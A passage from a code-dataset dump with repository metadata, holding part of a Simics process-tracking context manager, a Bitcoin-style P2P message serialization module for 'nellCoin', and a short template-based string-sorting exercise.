False) SIM_run_alone(self.setAllHap, True) elif len(self.watch_rec_list) > 0 and new_addr not in self.watch_rec_list: ''' Watching processes, but new process should not be watched ''' if self.debugging_pid is not None: cpu.current_context = self.default_context #self.lgr.debug('default_context') #self.lgr.debug('No longer scheduled') self.watching_tasks = False #self.auditExitBreaks() self.clearAllBreak() #if pid not in self.task_switch: # self.task_switch[pid] = [] #self.task_switch[pid].append(self.cpu.cycles) SIM_run_alone(self.clearAllHap, False) elif len(self.watch_rec_list) > 0: ''' switching between watched pids ''' #if pid not in self.task_switch: # self.task_switch[pid] = [] #self.task_switch[pid].append(self.cpu.cycles) pass if self.catch_pid == pid: self.lgr.debug('contextManager changedThread do catch_callback for pid %d' % pid) SIM_break_simulation('in pid %d' % pid) #SIM_run_alone(self.catch_callback, None) self.catch_pid = None def catchPid(self, pid, callback): self.catch_pid = pid self.catch_callback = callback def watchAll(self): self.watch_only_this = False def watchOnlyThis(self): ctask = self.task_utils.getCurTaskRec() cur_pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) pcopy = list(self.pid_cache) for pid in pcopy: if pid != cur_pid: self.rmTask(pid) self.watch_only_this = True def rmTask(self, pid, killed=False): ''' remove a pid from the list of task records being watched. return True if this is the last thread. 
''' retval = False rec = self.task_utils.getRecAddrForPid(pid) if rec is None and killed: ''' assume record already gone ''' for r in self.watch_rec_list: if self.watch_rec_list[r] == pid: rec = r self.lgr.debug('contextManager rmTask %d rec already gone, remove its entries' % pid) break if rec in self.watch_rec_list: del self.watch_rec_list[rec] self.lgr.debug('rmTask removing rec 0x%x for pid %d, len now %d' % (rec, pid, len(self.watch_rec_list))) if pid in self.pid_cache: self.pid_cache.remove(pid) self.lgr.debug('rmTask remove %d from cache, cache now %s' % (pid, str(self.pid_cache))) if pid in self.task_rec_bp and self.task_rec_bp[pid] is not None: SIM_delete_breakpoint(self.task_rec_bp[pid]) self.lgr.debug('contextManger rmTask pid %d' % pid) SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid]) del self.task_rec_bp[pid] del self.task_rec_hap[pid] del self.task_rec_watch[pid] if len(self.watch_rec_list) == 0: if self.debugging_comm is None: self.lgr.warning('contextManager rmTask debugging_comm is None') else: self.lgr.debug('contextManager rmTask watch_rec_list empty, clear debugging_pid') #self.debugging_comm = None #self.debugging_cell = None pids = self.task_utils.getPidsForComm(self.debugging_comm) if len(pids) == 0: self.cpu.current_context = self.default_context self.stopWatchTasks() retval = True else: if self.top.swapSOPid(pid, pids[0]): self.lgr.debug('contextManager rmTask, still pids for comm %s, was fork? 
set dbg pid to %d' % (self.debugging_comm, pids[0])) ''' replace SOMap pid with new one from fork ''' self.debugging_pid = pids[0] else: ''' TBD poor hueristic for deciding it was not a fork ''' self.cpu.current_context = self.default_context self.stopWatchTasks() retval = True elif pid == self.debugging_pid: self.debugging_pid = self.pid_cache[0] self.lgr.debug('rmTask debugging_pid now %d' % self.debugging_pid) else: self.lgr.debug('rmTask remaining debug recs %s' % str(self.watch_rec_list)) return retval def addTask(self, pid, rec=None): if rec is None: rec = self.task_utils.getRecAddrForPid(pid) if rec not in self.watch_rec_list: if rec is None: #self.lgr.debug('genContextManager, addTask got rec of None for pid %d, pending' % pid) self.pending_watch_pids.append(pid) else: #self.lgr.debug('genContextManager, addTask pid %d add rec 0x%x' % (pid, rec)) self.watch_rec_list[rec] = pid self.watchExit(rec=rec, pid=pid) if pid not in self.pid_cache: self.pid_cache.append(pid) else: #self.lgr.debug('addTask, already has rec 0x%x for PID %d' % (rec, pid)) pass def watchingThis(self): ctask = self.task_utils.getCurTaskRec() dumb, comm, cur_pid = self.task_utils.curProc() if cur_pid in self.pid_cache or ctask in self.watch_rec_list: #self.lgr.debug('am watching pid:%d' % cur_pid) return True else: #self.lgr.debug('not watching %d' % cur_pid) return False def amWatching(self, pid): ctask = self.task_utils.getCurTaskRec() dumb, comm, cur_pid = self.task_utils.curProc() if pid == cur_pid and (ctask in self.watch_rec_list or len(self.watch_rec_list)==0): return True elif pid in self.pid_cache: return True else: return False def restoreDefaultContext(self): self.cpu.current_context = self.default_context self.lgr.debug('contextManager restoreDefaultContext') def restoreDebugContext(self): self.cpu.current_context = self.resim_context self.lgr.debug('contextManager restoreDebugContext') def restoreDebug(self): self.debugging_pid = self.debugging_pid_saved self.watch_rec_list = 
self.watch_rec_list_saved.copy() for ctask in self.watch_rec_list: self.pid_cache.append(self.watch_rec_list[ctask]) self.cpu.current_context = self.resim_context self.lgr.debug('contextManager restoreDebug set cpu context to resim, debugging_pid to %s' % str(self.debugging_pid)) def stopWatchTasks(self): if self.task_break is None: self.lgr.debug('stopWatchTasks already stopped') return SIM_delete_breakpoint(self.task_break) SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_hap) self.task_hap = None self.task_break = None self.watching_tasks = False self.watch_rec_list_saved = self.watch_rec_list.copy() if self.debugging_pid is not None: self.debugging_pid_saved = self.debugging_pid self.watch_rec_list = {} for pid in self.task_rec_bp: if self.task_rec_bp[pid] is not None: self.lgr.debug('stopWatchTasks delete bp %d' % self.task_rec_bp[pid]) SIM_delete_breakpoint(self.task_rec_bp[pid]) SIM_hap_delete_callback_id('Core_Breakpoint_Memop', self.task_rec_hap[pid]) self.task_rec_bp = {} self.task_rec_hap = {} self.task_rec_watch = {} self.pid_cache = [] self.debugging_pid = None cpu, dumb, dumb2 = self.task_utils.curProc() cpu.current_context = self.default_context self.lgr.debug('stopWatchTasks reverted %s to default context %s' % (cpu.name, str(self.default_context))) def resetWatchTasks(self): ''' Intended for use when going back in time ''' self.lgr.debug('resetWatchTasks') self.stopWatchTasks() self.watchTasks(set_debug_pid = True) if not self.watch_only_this: ctask = self.task_utils.getCurTaskRec() pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) if pid == 1: self.lgr.debug('resetWatchTasks got leader pid of 1, skip') return leader_pid = self.task_utils.getGroupLeaderPid(pid) pid_list = self.task_utils.getGroupPids(leader_pid) for pid in pid_list: if pid == 1: self.lgr.debug('resetWatchTasks got pid of 1, skip') else: self.addTask(pid) def setTaskHap(self): #print('genContextManager setTaskHap debugging_cell is %s' % 
self.debugging_cell) self.task_break = SIM_breakpoint(self.cpu.physical_memory, Sim_Break_Physical, Sim_Access_Write, self.phys_current_task, self.mem_utils.WORD_SIZE, 0) #self.lgr.debug('genContextManager setTaskHap bp %d' % self.task_break) self.task_hap = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.changedThread, self.cpu, self.task_break) #self.lgr.debug('setTaskHap cell %s break %d set on physical 0x%x' % (self.cell_name, self.task_break, self.phys_current_task)) def restoreWatchTasks(self): self.watching_tasks = True if self.debugging_pid is not None: self.lgr.debug('contextManager restoreWatchTasks cpu context to resim') self.cpu.current_context = self.resim_context def watchTasks(self, set_debug_pid = False): if self.task_break is not None: #self.lgr.debug('watchTasks called, but already watching') return ctask = self.task_utils.getCurTaskRec() pid = self.mem_utils.readWord32(self.cpu, ctask + self.param.ts_pid) if pid == 1: #self.lgr.debug('contextManager watchTasks, pid is 1, ignore') return if self.task_break is None: self.setTaskHap() self.watching_tasks = True self.watchExit() self.pageFaultGen.recordPageFaults() if ctask in self.watch_rec_list: self.lgr.debug('watchTasks, current task already being watched') return self.lgr.debug('watchTasks cell %s watch record 0x%x pid: %d set_debug_pid: %r' % (self.cell_name, ctask, pid, set_debug_pid)) self.watch_rec_list[ctask] = pid if pid not in self.pid_cache: self.pid_cache.append(pid) group_leader = self.task_utils.getGroupLeaderPid(pid) if group_leader != self.group_leader: #self.lgr.debug('contextManager watchTasks x set group leader to %d' % group_leader) self.group_leader = group_leader if set_debug_pid: self.setDebugPid() def changeDebugPid(self, pid): if pid not in self.pid_cache: self.lgr.error('contextManager changeDebugPid not in pid cache %d' % pid) return self.lgr.debug('changeDebugPid to %d' % pid) self.debugging_pid = pid def singleThread(self, single): self.single_thread = single 
def setDebugPid(self):
    '''Mark the currently scheduled process as the one being debugged and
    switch the CPU to the RESim context so debug breakpoints fire for it.'''
    if self.debugging_pid is not None:
        self.lgr.debug('contextManager setDebugPid already set to %d' % self.debugging_pid)
        return
    cell, comm, cur_pid = self.task_utils.curProc()
    #self.default_context = self.cpu.current_context
    self.cpu.current_context = self.resim_context
    self.lgr.debug('setDebugPid %d, (%s) resim_context' % (cur_pid, comm))
    self.debugging_pid = cur_pid
    self.debugging_comm = comm
    self.debugging_cell = self.top.getCell()
    if cur_pid not in self.pid_cache:
        self.pid_cache.append(cur_pid)

def killGroup(self, lead_pid, exit_syscall):
    '''Treat every cached pid in the debugged thread group as exited when the
    group leader is killed; a pid seen outside the cache (a fork?) is re-added.'''
    self.top.rmDebugExitHap()
    if lead_pid == self.group_leader:
        pids = self.task_utils.getPidsForComm(self.debugging_comm)
        add_task = None
        for p in pids:
            if p not in self.pid_cache:
                self.lgr.debug('killGroup found pid %d not in cache, was it a fork?' % p)
                add_task = p
                break
        self.lgr.debug('contextManager killGroup %d is leader, pid_cache is %s' % (lead_pid, str(self.pid_cache)))
        # iterate over a copy: handleExit may mutate pid_cache
        cache_copy = list(self.pid_cache)
        for pid in cache_copy:
            ida_msg = 'killed %d member of group led by %d' % (pid, lead_pid)
            exit_syscall.handleExit(pid, ida_msg, killed=True, retain_so=True)
            #self.rmTask(pid, killed=True)
            #if pid in self.demise_cache:
            #    self.demise_cache.remove(pid)
            if self.pageFaultGen is not None:
                if self.pageFaultGen.handleExit(pid):
                    print('SEGV on pid %d?' % pid)
                    self.lgr.debug('genContextManager SEGV on pid %d?' % pid)
        self.clearExitBreaks()
        if add_task is not None:
            self.addTask(add_task)
    elif self.group_leader != None:
        self.lgr.debug('contextManager killGroup NOT leader. got %d, leader was %d' % (lead_pid, self.group_leader))
        if self.pageFaultGen is not None:
            self.pageFaultGen.handleExit(lead_pid)
    else:
        self.lgr.debug('contextManager killGroup NO leader. got %d' % (lead_pid))
        if self.pageFaultGen is not None:
            self.pageFaultGen.handleExit(lead_pid)

def deadParrot(self, pid):
    ''' who knew? death comes betweeen the breakpoint and the "run alone" scheduling.
    Clean up a pid whose task record has vanished.'''
    exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
    if exit_syscall is not None and not self.watching_page_faults:
        ida_msg = 'pid:%d exit via kill?' % pid
        self.lgr.debug('contextManager deadParrot pid:%d rec no longer found call killGroup' % (pid))
        self.killGroup(pid, exit_syscall)
        #exit_syscall.handleExit(pid, ida_msg, killed=True)
    else:
        self.rmTask(pid)
        if self.pageFaultGen is not None:
            self.pageFaultGen.handleExit(pid)
        self.clearExitBreaks()
        self.lgr.debug('contextManager deadParrot pid:%d rec no longer found removed task' % (pid))
    if self.exit_callback is not None:
        self.exit_callback()

def resetAlone(self, pid):
    '''Scheduled via SIM_run_alone from taskRecHap: re-arm the exit watch for a
    pid whose task record was written but still exists, or finish its demise.'''
    self.lgr.debug('contextManager resetAlone')
    dead_rec = self.task_utils.getRecAddrForPid(pid)
    if dead_rec is not None:
        list_addr = self.task_utils.getTaskListPtr(dead_rec)
        if list_addr is not None:
            self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d still found though written by maybe not dead after all? new list_addr is 0x%x' % (dead_rec, pid, list_addr))
            SIM_delete_breakpoint(self.task_rec_bp[pid])
            del self.task_rec_bp[pid]
            SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
            del self.task_rec_hap[pid]
            del self.task_rec_watch[pid]
            self.watchExit(rec=dead_rec, pid=pid)
        else:
            self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d EXCEPT new list_addr is None call deadParrot' % (dead_rec, pid))
            self.deadParrot(pid)
    else:
        self.lgr.debug('contextMgr resetAlone pid %d no record for pid, call deadParrot' % (pid))
        self.deadParrot(pid)
    if pid in self.demise_cache:
        self.demise_cache.remove(pid)

def taskRecHap(self, pid, third, forth, memory):
    '''Breakpoint callback: another process wrote the task-list pointer that
    references pid's record, which usually means pid is being torn down.'''
    self.lgr.debug('taskRecHap pid %d' % pid)
    if pid not in self.task_rec_hap or pid in self.demise_cache:
        return
    dumb, comm, cur_pid = self.task_utils.curProc()
    self.lgr.debug('contextManager taskRecHap demise of pid:%d by the hand of cur_pid %d?' % (pid, cur_pid))
    dead_rec = self.task_utils.getRecAddrForPid(pid)
    if dead_rec is not None:
        if pid != cur_pid:
            self.lgr.debug('contextManager taskRecHap got record 0x%x for %d, call resetAlone' % (dead_rec, pid))
            self.demise_cache.append(pid)
            # cannot delete breakpoints from within the hap; defer
            SIM_run_alone(self.resetAlone, pid)
        else:
            self.lgr.debug('Pid %d messing with its own task rec? Let it go.' % pid)
    else:
        value = SIM_get_mem_op_value_le(memory)
        self.lgr.debug('contextManager taskRecHap pid:%d wrote 0x%x to 0x%x watching for demise of %d' % (cur_pid, value, memory.logical_address, pid))
        exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group')
        if exit_syscall is not None and not self.watching_page_faults:
            ida_msg = 'pid:%d exit via kill?' % pid
            self.killGroup(pid, exit_syscall)
            #exit_syscall.handleExit(pid, ida_msg, killed=True)
        else:
            self.rmTask(pid)
        if self.exit_callback is not None:
            self.exit_callback()

def setExitCallback(self, callback):
    '''Register a callable invoked whenever a watched process exits.'''
    self.exit_callback = callback

def watchGroupExits(self):
    '''Arm exit watches for every pid in the current process's thread group.'''
    dumb, comm, cur_pid = self.task_utils.curProc()
    leader_pid = self.task_utils.getGroupLeaderPid(cur_pid)
    if leader_pid is None:
        self.lgr.error('contextManager watchGroupExits no group leader for %d' % cur_pid)
    # NOTE(review): if leader_pid is None the next debug line (%d) and
    # getGroupPids(None) would fail; original behavior kept — confirm intent.
    self.lgr.debug('contextManager watchGroupExit cur_pid %d, leader %d' % (cur_pid, leader_pid))
    pid_dict = self.task_utils.getGroupPids(leader_pid)
    for pid in pid_dict:
        self.watchExit(rec=pid_dict[pid], pid=pid)

def watchExit(self, rec=None, pid=None):
    ''' set breakpoint on task record that points to this (or the given) pid.
    Returns False when no usable task record or list pointer is found.'''
    retval = True
    dumb, comm, cur_pid = self.task_utils.curProc()
    if pid is None and cur_pid == 1:
        self.lgr.debug('watchExit for pid 1, ignore')
        return False
    if pid is None:
        pid = cur_pid
        rec = self.task_utils.getCurTaskRec()
    if rec is None:
        self.lgr.error('contextManager watchExit failed to get list_addr pid %d cur_pid %d ' % (pid, cur_pid))
        return False
    list_addr = self.task_utils.getTaskListPtr(rec)
    if list_addr is None:
        ''' suspect the thread is in the kernel, e.g., on a syscall, and has not
        yet been formally scheduled, and thus has no place in the task list?
        OR all threads share the same next_ts pointer'''
        #self.lgr.debug('contextManager watchExit failed to get list_addr pid %d cur_pid %d rec 0x%x' % (pid, cur_pid, rec))
        return False
    if pid not in self.task_rec_bp or self.task_rec_bp[pid] is None:
        watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
        # both branches currently choose the default context (resim alternative
        # left commented out in the original)
        if watch_pid in self.pid_cache:
            #cell = self.resim_context
            cell = self.default_context
        else:
            cell = self.default_context
            #cell = self.resim_context
        self.task_rec_bp[pid] = SIM_breakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0)
        self.task_rec_hap[pid] = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.taskRecHap, pid, self.task_rec_bp[pid])
        self.task_rec_watch[pid] = list_addr
    else:
        #self.lgr.debug('contextManager watchExit, already watching for pid %d' % pid)
        pass
    return retval

def auditExitBreaks(self):
    '''Diagnostic: cross-check each recorded task-list watch address against
    what taskUtils currently reports; log any drift.'''
    for pid in self.task_rec_watch:
        rec = self.task_utils.getRecAddrForPid(pid)
        if rec is None:
            self.lgr.debug('contextManager auditExitBreaks failed to get task record for pid %d' % pid)
        else:
            list_addr = self.task_utils.getTaskListPtr(rec)
            if list_addr is None:
                ''' suspect the thread is in the kernel, e.g., on a syscall, and has
                not yet been formally scheduled, and thus has no place in the task list? '''
                self.lgr.debug('contextManager auditExitBreaks failed to get list_addr pid %d rec 0x%x' % (pid, rec))
            elif self.task_rec_watch[pid] is None:
                watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
                self.lgr.debug('contextManager auditExitBreaks rec_watch for %d is None, but taskUtils reports %d' % (pid, watch_pid))
            elif list_addr != self.task_rec_watch[pid]:
                watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr)
                prev_pid, prev_comm = self.task_utils.getPidCommFromNext(self.task_rec_watch[pid])
                self.lgr.debug('contextManager auditExitBreaks changed in record watch for death of %d, was watching %d, now %d' % (pid, watch_pid, prev_pid))

def setExitBreaks(self):
    '''Re-arm exit watches for every pid already tracked in task_rec_bp.'''
    for pid in self.task_rec_bp:
        rec = self.task_utils.getRecAddrForPid(pid)
        self.watchExit(rec, pid)

def clearExitBreaks(self):
    '''Delete all exit breakpoints/haps but keep the pid keys for re-arming.'''
    self.lgr.debug('contextManager clearExitBreaks')
    for pid in self.task_rec_bp:
        if self.task_rec_bp[pid] is not None:
            SIM_delete_breakpoint(self.task_rec_bp[pid])
            self.task_rec_bp[pid] = None
    for pid in self.task_rec_hap:
        if self.task_rec_hap[pid] is not None:
            SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid])
            self.task_rec_hap[pid] = None

def resetBackStop(self):
    pass

def getIdaMessage(self):
    return self.ida_message

def getDebugPid(self):
    '''Return (debugged pid or None, cpu object).'''
    return self.debugging_pid, self.cpu

def showIdaMessage(self):
    # fixed: was a Python-2 print statement in a Python-3 module
    print('genMonitor says: %s' % self.ida_message)
    self.lgr.debug('genMonitor says: %s' % self.ida_message)

def setIdaMessage(self, message):
    #self.lgr.debug('ida message set to %s' % message)
    self.ida_message = message

def getRESimContext(self):
    return self.resim_context

def getDefaultContext(self):
    return self.default_context

def watchPageFaults(self, watching):
    self.watching_page_faults = watching

def callMe(self, pageFaultGen):
    '''Late-bind the pageFaultGen collaborator (set after construction).'''
    self.pageFaultGen = pageFaultGen
52fac62da61576ec22dc52af49eaae937130bdfd
9ec1242ae20b6f407f25a266456d83fb8a3d5f73
/src/nellCoin/lib/messages.py
dd5b6fb432476e6c8530ccf6e7483d3a9b8685ad
[ "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-public-domain", "MIT" ]
permissive
Nell-MDCoin/Nell-MDCoin
5b6d6af7e141844ba22970adacd4877d024e872b
9a1be366aba13539132dc7d0a9f0fdeaa2e19044
refs/heads/master
2020-03-21T23:17:23.329553
2018-06-29T17:32:53
2018-06-29T17:32:53
139,177,535
3
1
null
null
null
null
UTF-8
Python
false
false
9,907
py
# messages.py
#
# Distributed under the MIT/X11 software license
"""Bitcoin-style P2P wire messages for nellCoin.

Python 2 code (uses cStringIO; str/bytes are interchangeable in message_read).
Serialization helpers (CAddress, deser_string, hashlib, ...) are expected to
come from the star imports below — TODO confirm against coredefs/core.
"""
from __future__ import absolute_import, division, print_function, unicode_literals

import struct
import time
import random
import cStringIO

from nellCoin.lib.coredefs import *
from nellCoin.lib.core import *

# inventory-vector type codes
MSG_TX = 1
MSG_BLOCK = 2


class msg_version(object):
    """'version' handshake message."""
    command = b"version"

    def __init__(self, protover=PROTO_VERSION):
        # NOTE(review): self.protover is forced to MIN_PROTO_VERSION and the
        # protover argument only feeds nVersion — looks deliberate but confirm.
        self.protover = MIN_PROTO_VERSION
        self.nVersion = protover
        self.nServices = 1
        self.nTime = time.time()
        self.addrTo = CAddress(MIN_PROTO_VERSION)
        self.addrFrom = CAddress(MIN_PROTO_VERSION)
        self.nNonce = random.getrandbits(64)
        self.strSubVer = b'/python-bitcoin-0.0.1/'
        self.nStartingHeight = -1

    def deserialize(self, f):
        self.nVersion = struct.unpack(b"<i", f.read(4))[0]
        # legacy clients reported 10300 — presumably normalized here; confirm
        if self.nVersion == 10300:
            self.nVersion = 300
        self.nServices = struct.unpack(b"<Q", f.read(8))[0]
        self.nTime = struct.unpack(b"<q", f.read(8))[0]
        self.addrTo = CAddress(MIN_PROTO_VERSION)
        self.addrTo.deserialize(f)
        # fields below only exist for protocol >= 106
        if self.nVersion >= 106:
            self.addrFrom = CAddress(MIN_PROTO_VERSION)
            self.addrFrom.deserialize(f)
            self.nNonce = struct.unpack(b"<Q", f.read(8))[0]
            self.strSubVer = deser_string(f)
            # starting height only for protocol >= 209
            if self.nVersion >= 209:
                self.nStartingHeight = struct.unpack(b"<i", f.read(4))[0]
            else:
                self.nStartingHeight = None
        else:
            self.addrFrom = None
            self.nNonce = None
            self.strSubVer = None
            self.nStartingHeight = None

    def serialize(self):
        r = b""
        r += struct.pack(b"<i", self.nVersion)
        r += struct.pack(b"<Q", self.nServices)
        r += struct.pack(b"<q", self.nTime)
        r += self.addrTo.serialize()
        r += self.addrFrom.serialize()
        r += struct.pack(b"<Q", self.nNonce)
        r += ser_string(self.strSubVer)
        r += struct.pack(b"<i", self.nStartingHeight)
        return r

    def __repr__(self):
        return "msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)" % (self.nVersion, self.nServices, time.ctime(self.nTime), repr(self.addrTo), repr(self.addrFrom), self.nNonce, self.strSubVer, self.nStartingHeight)


class msg_verack(object):
    """'verack' — empty acknowledgement of a version message."""
    command = b"verack"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover

    def deserialize(self, f):
        pass

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_verack()"


class msg_addr(object):
    """'addr' — list of known peer addresses."""
    command = b"addr"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.addrs = []

    def deserialize(self, f):
        self.addrs = deser_vector(f, CAddress, self.protover)

    def serialize(self):
        return ser_vector(self.addrs)

    def __repr__(self):
        return "msg_addr(addrs=%s)" % (repr(self.addrs))


class msg_alert(object):
    """'alert' — network alert payload."""
    command = b"alert"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.alert = CAlert()

    def deserialize(self, f):
        self.alert = CAlert()
        self.alert.deserialize(f)

    def serialize(self):
        r = b""
        r += self.alert.serialize()
        return r

    def __repr__(self):
        return "msg_alert(alert=%s)" % (repr(self.alert), )


class msg_inv(object):
    """'inv' — inventory announcement (tx/block hashes)."""
    command = b"inv"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.inv = []

    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)

    def serialize(self):
        return ser_vector(self.inv)

    def __repr__(self):
        return "msg_inv(inv=%s)" % (repr(self.inv))


class msg_getdata(object):
    """'getdata' — request the objects named in an inv vector."""
    command = b"getdata"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.inv = []

    def deserialize(self, f):
        self.inv = deser_vector(f, CInv)

    def serialize(self):
        return ser_vector(self.inv)

    def __repr__(self):
        return "msg_getdata(inv=%s)" % (repr(self.inv))


class msg_getblocks(object):
    """'getblocks' — request block hashes after a locator, up to hashstop."""
    command = b"getblocks"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.locator = CBlockLocator()
        self.hashstop = 0

    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)

    def serialize(self):
        r = b""
        r += self.locator.serialize()
        r += ser_uint256(self.hashstop)
        return r

    def __repr__(self):
        return "msg_getblocks(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)


class msg_getheaders(object):
    """'getheaders' — like getblocks but for block headers."""
    command = b"getheaders"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.locator = CBlockLocator()
        self.hashstop = 0

    def deserialize(self, f):
        self.locator = CBlockLocator()
        self.locator.deserialize(f)
        self.hashstop = deser_uint256(f)

    def serialize(self):
        r = b""
        r += self.locator.serialize()
        r += ser_uint256(self.hashstop)
        return r

    def __repr__(self):
        return "msg_getheaders(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop)


class msg_headers(object):
    """'headers' — vector of block headers."""
    command = b"headers"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.headers = []

    def deserialize(self, f):
        self.headers = deser_vector(f, CBlock)

    def serialize(self):
        return ser_vector(self.headers)

    def __repr__(self):
        return "msg_headers(headers=%s)" % (repr(self.headers))


class msg_tx(object):
    """'tx' — a single transaction."""
    command = b"tx"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.tx = CTransaction()

    def deserialize(self, f):
        self.tx.deserialize(f)

    def serialize(self):
        return self.tx.serialize()

    def __repr__(self):
        return "msg_tx(tx=%s)" % (repr(self.tx))


class msg_block(object):
    """'block' — a full block."""
    command = b"block"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover
        self.block = CBlock()

    def deserialize(self, f):
        self.block.deserialize(f)

    def serialize(self):
        return self.block.serialize()

    def __repr__(self):
        return "msg_block(block=%s)" % (repr(self.block))


class msg_getaddr(object):
    """'getaddr' — ask a peer for its address list (empty payload)."""
    command = b"getaddr"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover

    def deserialize(self, f):
        pass

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_getaddr()"


#msg_checkorder
#msg_submitorder
#msg_reply


class msg_ping(object):
    """'ping' — keepalive; carries a nonce only after BIP-31."""
    command = b"ping"

    def __init__(self, protover=PROTO_VERSION, nonce=0):
        self.protover = protover
        self.nonce = nonce

    def deserialize(self, f):
        if self.protover > BIP0031_VERSION:
            self.nonce = struct.unpack(b"<Q", f.read(8))[0]

    def serialize(self):
        r = b""
        if self.protover > BIP0031_VERSION:
            r += struct.pack(b"<Q", self.nonce)
        return r

    def __repr__(self):
        return "msg_ping(0x%x)" % (self.nonce,)


class msg_pong(object):
    """'pong' — reply echoing a ping nonce."""
    command = b"pong"

    def __init__(self, protover=PROTO_VERSION, nonce=0):
        self.protover = protover
        self.nonce = nonce

    def deserialize(self, f):
        self.nonce = struct.unpack(b"<Q", f.read(8))[0]

    def serialize(self):
        r = b""
        r += struct.pack(b"<Q", self.nonce)
        return r

    def __repr__(self):
        return "msg_pong(0x%x)" % (self.nonce,)


class msg_mempool(object):
    """'mempool' — request the peer's mempool contents (empty payload)."""
    command = b"mempool"

    def __init__(self, protover=PROTO_VERSION):
        self.protover = protover

    def deserialize(self, f):
        pass

    def serialize(self):
        return b""

    def __repr__(self):
        return "msg_mempool()"


# command name -> message class used by message_read to deserialize payloads
messagemap = {
    "version": msg_version,
    "verack": msg_verack,
    "addr": msg_addr,
    "alert": msg_alert,
    "inv": msg_inv,
    "getdata": msg_getdata,
    "getblocks": msg_getblocks,
    "tx": msg_tx,
    "block": msg_block,
    "getaddr": msg_getaddr,
    "ping": msg_ping,
    "pong": msg_pong,
    "mempool": msg_mempool
}


def message_read(netmagic, f):
    """Read one framed message from f and return the deserialized object.

    Frame layout: 4-byte magic, 12-byte NUL-padded command, 4-byte length,
    4-byte double-SHA256 checksum, then the payload. Returns None on IOError
    or unknown command; raises ValueError on bad magic or bad checksum.
    """
    try:
        recvbuf = f.read(4 + 12 + 4 + 4)
    except IOError:
        return None

    # check magic
    if len(recvbuf) < 4:
        return
    if recvbuf[:4] != netmagic.msg_start:
        raise ValueError("got garbage %s" % repr(recvbuf))

    # check checksum
    if len(recvbuf) < 4 + 12 + 4 + 4:
        return

    # remaining header fields: command, msg length, checksum
    command = recvbuf[4:4+12].split(b"\x00", 1)[0]
    msglen = struct.unpack(b"<i", recvbuf[4+12:4+12+4])[0]
    checksum = recvbuf[4+12+4:4+12+4+4]

    # read message body
    try:
        recvbuf += f.read(msglen)
    except IOError:
        return None

    msg = recvbuf[4+12+4+4:4+12+4+4+msglen]
    # checksum is the first 4 bytes of double-SHA256 of the payload
    th = hashlib.sha256(msg).digest()
    h = hashlib.sha256(th).digest()
    if checksum != h[:4]:
        raise ValueError("got bad checksum %s" % repr(recvbuf))
    recvbuf = recvbuf[4+12+4+4+msglen:]

    if command in messagemap:
        f = cStringIO.StringIO(msg)
        t = messagemap[command]()
        t.deserialize(f)
        return t
    else:
        return None


def message_to_str(netmagic, message):
    """Serialize a message object into a fully framed wire string."""
    command = message.command
    data = message.serialize()
    tmsg = netmagic.msg_start
    tmsg += command
    tmsg += b"\x00" * (12 - len(command))   # pad command field to 12 bytes
    tmsg += struct.pack(b"<I", len(data))

    # add checksum
    th = hashlib.sha256(data).digest()
    h = hashlib.sha256(th).digest()
    tmsg += h[:4]

    tmsg += data
    return tmsg
9d9c1305ed57e2a327da571c32f06702b2a1fc11
f0d713996eb095bcdc701f3fab0a8110b8541cbb
/Akx92Ldcy78xp5zCF_4.py
9d5e1d493ab24f7c6508ffe8f4080fda61583184
[]
no_license
daniel-reich/turbo-robot
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
a7a25c63097674c0a81675eed7e6b763785f1c41
refs/heads/main
2023-03-26T01:55:14.210264
2021-03-23T16:08:01
2021-03-23T16:08:01
350,773,815
0
0
null
null
null
null
UTF-8
Python
false
false
669
py
""" The function is given two strings `t` \- template, `s` \- to be sorted. Sort the characters in `s` such that if the character is present in `t` then it is sorted according to the order in `t` and other characters are sorted alphabetically after the ones found in `t`. ### Examples custom_sort("edc", "abcdefzyx") ➞ "edcabfxyz" custom_sort("fby", "abcdefzyx") ➞ "fbyacdexz" custom_sort("", "abcdefzyx") ➞ "abcdefxyz" custom_sort("", "") ➞ "" ### Notes The characters in `t` and `s` are all lower-case. """ def custom_sort(t, s): ​ return ''.join(sorted(list(s), key=lambda x: t.index(x) if x in t else ord(x) ))
dffb8f1d28234925bf2aa668f60bba767b675746
f1a5d89b17e3bf0f354546cc47c329a81f15dfc9
/apps/__init__.py
9827ad08f3307fbdc79dfbb87ce314af564b62c8
[]
